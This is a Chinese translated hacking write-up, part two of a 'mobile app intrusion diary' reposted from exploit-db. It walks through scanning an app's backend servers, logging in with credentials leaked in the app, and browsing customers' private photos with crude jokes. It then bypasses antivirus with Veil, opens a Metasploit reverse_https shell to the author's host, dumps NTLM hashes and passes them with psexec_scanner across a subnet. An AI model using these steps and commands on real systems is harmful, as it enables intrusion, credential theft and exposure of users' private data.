手机应用入侵日记(下)

手机应用入侵日记(上)》发布后广受好评,现在推出下集,希望各位喜欢。

 

[0x03] – 服务端攻击

 

“多数情况下,与客户端通信的是一个或多个web服务器。对手机应用服务器端的攻击与对普通的web站点攻击类似。除了寻找web应用的漏洞,还需要对目标主机进行扫描,看看运行了哪些服务,之后再进行漏洞扫描,来找到潜在的漏洞。当然,要在许可的情况下进行这些操作喔。”

——SANS渗透测试博客

 

      [0x03a] – 扫描

 

根据上文,我们已经从源码中找到了后台IP地址(203.60.240.180 和 203.60.240.183),接下来,我们就要用Nmap扫描来检测下它的安全性。

首先用 nmap (http://nmap.org)对目标主机进行扫描来查看开放的端口。

对于203.60.240.180,Nmap 扫描结果 :

—————————————————————

[zeq3ul@12:30:54]-[~]> nmap -sV -PN 203.60.240.180

 

—————————————————————

 

 

 

对于203.60.240.183,Nmap 扫描结果 :

—————————————————————

[zeq3ul@12:35:12]-[~]> nmap -sV -PN 203.60.240.183

 

—————————————————————

 

从扫描结果中,我们找到了开着的端口,在203.60.240.180 运行着IIS还有终端服务, 203.60.240.183运行着FTP服务。是时候来采摘我们的果实了。

 

 

[0x03b] – 获取权限

 

因为我们已经在源码中找到了用户名和密码(“msec1s”,”S1lentM!@#$ec”)。我们就能访问服务器上运行的FTP服务了。如下:

FTP Server: 203.60.240.183

—————————————————————

—————————————————————

现在我们已经使用账号”msec1s”登录上了FTP服务器。我们能够访问所有客户的联系人,照片,视频等等了。我们希望找到一些“有趣的”照片或者剪辑的视频;但是我们发现了DICK!!!WTF(不懂就百度)!!我们就停止了搜索。给跪…

 

 

把目标移向下一个主机, 203.60.240.180, 我们试着通过终端服务来访问它. 非常幸运,我们使用FTP的那个用户名密码(“msec1s”,”S1lentM!@#$ec”)就能访问(大忌!几个服务都使用同一个账号密码)。太爽了!

使用rdesktop访问远程桌面

—————————————————————

[zeq3ul@12:56:04]-[~]> rdesktop -u msec1s -p S1lentM!@#$ec 203.60.240.180

—————————————————————

 

另外, “msecls” 账号还有管理员权限. 越来越爽了!

 

 

[0x03c] – 绕过杀毒软件

 

很多杀毒软件通过特征码来查杀病毒。如果杀软发现恶意软件的特征码,就会隔离或是清除它。如果杀软在文件中找不到病毒特征码,就认为它是安全的。

Veil,这个由Blackhat安全专家Chris Truncer写的payload生成工具,可以帮助我们出色的完成这个任务。

源码下载:https://www.christophertruncer.com/veil-a-payload-generator-to-bypass-antivirus、

对veil的利用,可以看本站原创翻译的文章《Veil—绕过杀毒软件的payload生成器》。

 

使用我们的payload和msfveom shellcode,选择Reverse HTTPS到我们的web服务器(cwh.dyndns.org),命令如下:

 

 

现在我们已经得到了payload.exe文件,只要windows系统执行该文件,它就会立刻试着连到我们的服务器上。

 

 

[0x03d] – 拿下系统 !!

该拿下系统了!因为可以使用远程桌面服务(端口:3389)来访问目标服务器(203.60.140.180),目标主机能访问内网,我们就可以打开web服务器,然后远程登录到服务器,执行我们的payload(payload.exe)。运行的Metasploit payload(payload.exe)会连(reverse_https)到我们服务器(cwh.dyndns.org)上的meterpreter payload。

之后,我们使用hashdump得到服务器上的LM/NTLM hash,但是这是行不通的,因为如果你是64位系统,但是meterpreter不运行在64位系统上,就会失败,告诉我们版本不对(Meterpreter是32位程序).所以我们需要找到一个进程来移植然后在这反弹程序。本例中我们把我们的进程移植到到Winlogon进程(64位)上。

过程如下:

 

—————————————————————

[zeq3ul@13:16:14]-[~]> sudo msfconsole

[sudo] password for zeq3ul:

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https

PAYLOAD => windows/meterpreter/reverse_https

msf exploit(handler) > set LPORT 443

LPORT => 443

msf exploit(handler) > set LHOST cwh.dyndns.org

LHOST => cwh.dyndns.org

msf exploit(handler) > set ExitOnSession false

ExitOnSession => false

msf exploit(handler) > exploit -j

meterpreter > sysinfo

meterpreter > run hashdump

—————————————————————

 

现在,我们已经获得目标机器上的哈希了。哈希在手,权限我有啊,木哈哈~~

 

 

[0x03e] – 还没有结束

 

在正常情况下,我们接下来就要破解得到的hash了。破解windows hash会有花很多时间(呃,其实win下的密码哈希很好破解),所以你希望不费太多时间久可以绕过密码验证?

 

传递哈希密码攻击或许会是一个很好的方法,最简单利用“传递哈希密码攻击”的方法是利用Metasploit内置的PSEXEC module模块(exploit/windows/smb/psexec),这个模块能执行一个提供任意验证功能的payload。

这个payload能伪造一个 Windows SMB 服务的管理员证书(如果当你有了管理员的password或 hash后), 然后再在目标机子上建立一个windows的服务,然后你可以通过这个服务为跳板来提权。 当你获取到一台windows系统机器的哈希值的话,这个工具就成为你的首选的渗透测试工具啦。

 

著名黑客Carlos Perez也写出了psexec_scanner批量扫描版本,如果有兴趣的ri友,可以从下面的连接找到。

http://www.darkoperator.com/blog/2011/12/16/psexec-scanner-auxiliary-module.html

 

—————————————————————

meterpreter > background

[*] Backgrounding session 1…

msf exploit(handler) > use auxiliary/scanner/smb/psexec_scanner

msf auxiliary(psexec_scanner) > show options

msf auxiliary(psexec_scanner) > set LHOST cwh.dyndns.org

LHOST => cwh.dyndns.org

msf auxiliary(psexec_scanner) > set LPORT 8443

LPORT => 8443

msf auxiliary(psexec_scanner) > set RHOSTS 203.60.240.0/24

RHOSTS => 203.60.240.0/24

msf auxiliary(psexec_scanner) > set SMBUser administrator

SMBUser => administrator

msf auxiliary(psexec_scanner) > set SMBPass aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72

SMBPass => aad3b435b51404eeaad3b435b51404ee:de26cce0356891a4a020e7c4957afc72

msf auxiliary(psexec_scanner) > set THREADS 10

THREADS => 10

msf auxiliary(psexec_scanner) > exploit

msf auxiliary(psexec_scanner) > sessions -l

msf auxiliary(psexec_scanner) > sessions -i 3

[*] Starting interaction with 3…

meterpreter > getuid

Server username: NT AUTHORITYSYSTEM

meterpreter > sysinfo

—————————————————————

 

现在我们需要处理下一个主机了(203.60.240.165).

 

输入”netstat -an” 查看目标主机开放的端口,我们发现开放了3389端口,但是我们不能直接登录,因为该端口被防火墙过滤了。但是我们可以绕过它。

我们使用Meterpreter中的”portfwd”命令。Portfwd是个常见的利用pivoting技术来提供给攻击主机直接访问目标主机,他的原理就是自动打开另一条TCP连接,将目标端口转发到自动开辟的这条连接的端口上。你可以使用下列的命令来连接你的攻击主机和你的目标主机:

 

—————————————————————

—————————————————————

 

最后, 我们使用下面的 rdesktop 命令来连接目标服务器(203.60.240.165):

 

—————————————————————

—————————————————————

撸了这么久终于射了,好爽啊!!!

 

 

到这里,我们的攻击已经从刚开始的从手机应用里面搜集信息到最后的提权。中间的突破口是在手机应用的反汇编文件中找到它连接的FTP服务器的账号与密码,再通过一点社会工程学猜出了另一台web服务器机器的密码。提权的时候,紧跟着metasploit的步伐,算是一次MSF的高级利用吧,其实也将后面提权的部分看做是一次MSF提权的高级教程

好了,这次的手机应用入侵已经告一段落了哦,我们最近会开通投稿和积分换取礼物活动,如果各位ri友有什么好文章,请不吝赐教哦,连接入口:http://www.91ri.org/contribute

 

原文链接:http://www.exploit-db.com/papers/26620/

日币奖励:

本文为译文且为原创、首发,文章较生动形象,并有一定技术含量,给予日币奖励共6枚,译者与修改者分别获得3枚日币。

本文由网络攻防研究室(www.91ri.org)信息安全小组v2djia月巴_又鸟原创翻译,转载请注明出处。